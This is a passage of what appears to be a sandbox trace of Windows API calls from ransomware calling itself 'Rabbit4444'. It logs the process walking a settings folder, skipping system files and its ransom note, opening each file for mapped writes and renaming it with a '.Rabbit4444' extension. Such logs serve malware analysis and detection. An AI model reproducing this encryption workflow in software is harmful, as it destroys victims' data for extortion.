(hObject=0x278) returned 1 [0056.557] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms.Rabbit4444") returned 190 [0056.557] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessclosedcaptioning.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessClosedCaptioning.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessclosedcaptioning.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.558] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb398bd0, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xfb398bd0, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x467, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", cAlternateFileName="AA2192~1.SET")) returned 1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2=".") returned 1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="..") returned 1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="windows") returned -1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.558] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.559] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="boot") returned -1 [0056.559] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.559] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.559] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms" | out: lpString1="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms") returned="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms" [0056.559] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.559] lstrlenW (lpString="AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms") returned 58 [0056.559] lstrlenW (lpString="Rabbit4444") returned 10 [0056.559] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.559] lstrlenW (lpString=".dll") returned 4 [0056.559] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.559] lstrlenW (lpString=".lnk") returned 4 [0056.559] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.559] lstrlenW (lpString=".ini") returned 4 [0056.559] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.559] lstrlenW (lpString=".sys") returned 4 [0056.559] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccesshighcontrast.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.559] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.559] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14787019522) returned 1 [0056.559] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1127) returned 1 [0056.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1176f8 [0056.560] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0056.560] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x770, lpName=0x0) returned 0x298 [0056.561] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x770) returned 0x70000 [0056.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0056.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0056.562] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0056.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0056.562] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14787281229) returned 1 [0056.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1176f8 | out: hHeap=0xe0000) returned 1 [0056.562] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0056.562] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.562] CloseHandle (hObject=0x298) returned 1 [0056.562] CloseHandle (hObject=0x278) returned 1 [0056.562] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms.Rabbit4444") returned 186 [0056.562] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccesshighcontrast.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessHighContrast.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccesshighcontrast.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.563] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc38a7e4, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xfc38a7e4, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a9aeb1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", cAlternateFileName="AA0CA5~1.SET")) returned 1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2=".") returned 1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="..") returned 1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="windows") returned -1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="boot") returned -1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.563] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.563] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms" | out: lpString1="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms") returned="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms" [0056.563] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.564] lstrlenW (lpString="AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms") returned 54 [0056.564] lstrlenW (lpString="Rabbit4444") returned 10 [0056.564] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.564] lstrlenW (lpString=".dll") returned 4 [0056.564] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.564] lstrlenW (lpString=".lnk") returned 4 [0056.564] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.564] lstrlenW (lpString=".ini") returned 4 [0056.564] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.564] lstrlenW (lpString=".sys") returned 4 [0056.564] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.564] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccesskeyboard.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.564] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.564] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14787498593) returned 1 [0056.564] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1107) returned 1 [0056.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0056.564] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0056.564] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.568] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.569] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.569] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0056.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0056.570] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0056.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0056.570] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14788068345) returned 1 [0056.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0056.570] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0056.570] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.570] CloseHandle (hObject=0x298) returned 1 [0056.570] CloseHandle (hObject=0x278) returned 1 [0056.570] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms.Rabbit4444") returned 182 [0056.570] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccesskeyboard.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessKeyboard.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccesskeyboard.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.571] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfd4ad665, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xfd4ad665, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x23a0254b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", cAlternateFileName="AABD4A~1.SET")) returned 1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2=".") returned 1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="..") returned 1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="windows") returned -1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="boot") returned -1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.571] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.571] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms" | out: lpString1="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms") returned="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms" [0056.571] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.572] lstrlenW (lpString="AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms") returned 55 [0056.572] lstrlenW (lpString="Rabbit4444") returned 10 [0056.572] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.572] lstrlenW (lpString=".dll") returned 4 [0056.572] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.572] lstrlenW (lpString=".lnk") returned 4 [0056.572] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.572] lstrlenW (lpString=".ini") returned 4 [0056.572] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.572] lstrlenW (lpString=".sys") returned 4 [0056.572] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.572] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmagnifier.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0056.572] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0056.572] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14788291463) returned 1 [0056.572] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1112) returned 1 [0056.572] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0056.572] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0056.572] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x760, lpName=0x0) returned 0x298 [0056.573] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x760) returned 0x70000 [0056.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0056.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0056.574] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0056.574] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0056.575] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0056.575] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0056.575] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0056.575] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14788548343) returned 1 [0056.575] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0056.575] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101738 | out: hHeap=0xe0000) returned 1 [0056.575] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0056.575] CloseHandle (hObject=0x298) returned 1 [0056.575] CloseHandle (hObject=0x278) returned 1 [0056.575] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms.Rabbit4444") returned 183 [0056.575] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmagnifier.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMagnifier.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_settingspageeaseofaccessmagnifier.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0056.576] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x273a6c, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x273a6c, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x462, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", cAlternateFileName="AA913F~1.SET")) returned 1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2=".") returned 1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="..") returned 1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="windows") returned -1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="bootmgr") returned -1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="boot") returned -1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="ids.txt") returned -1 [0056.576] lstrcmpiW (lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0056.576] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms" | out: lpString1="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms") returned="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms" [0056.576] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0056.576] lstrlenW (lpString="AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms") returned 57 [0056.576] lstrlenW (lpString="Rabbit4444") returned 10 [0056.576] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0056.576] lstrlenW (lpString=".dll") returned 4 [0056.576] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0056.577] lstrlenW (lpString=".lnk") returned 4 [0056.577] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0056.577] lstrlenW (lpString=".ini") returned 4 [0056.577] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0056.577] lstrlenW (lpString=".sys") returned 4 [0056.577] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0056.577] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SettingsPageEaseOfAccessMoreOptions.settingcontent-ms" (normalized: 